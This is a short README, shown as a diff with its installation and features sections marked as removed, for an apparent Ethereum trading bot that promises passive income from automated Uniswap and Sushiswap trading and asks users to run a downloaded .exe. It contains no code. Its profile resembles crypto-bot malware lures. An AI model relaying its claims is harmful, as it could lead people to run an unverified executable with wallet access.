ColvoxvadSex/Ethereum-Trading-Bot/README.md

 This is a fully local program for Windows 64-bit and 32-bit PCs with internet access.
 It enables the creation of smart contracts and interaction with decentralized exchanges like Uniswap and Sushiswap.
 The program is completely autonomous, operates without reliance on cloud services, and supports passive income through automated trading on the Ethereum network.

-## Installation Instructions

-1. Download the ZIP file for your system (64-bit or 32-bit).
-2. Extract the archive to a convenient folder.
-3. Run the `eth-trading-bot-interface.exe` file to launch the program.

-## Features

-- **Smart Contract Creation**: Generates a personalized smart contract for your Ethereum wallet.
-- **Uniswap and Sushiswap Integration**: Automated trading on these DEXs for passive income.
-- **Local Execution**: Runs entirely on your PC, with no data sent to external servers.
-- **Autonomy**: Requires minimal intervention after setup.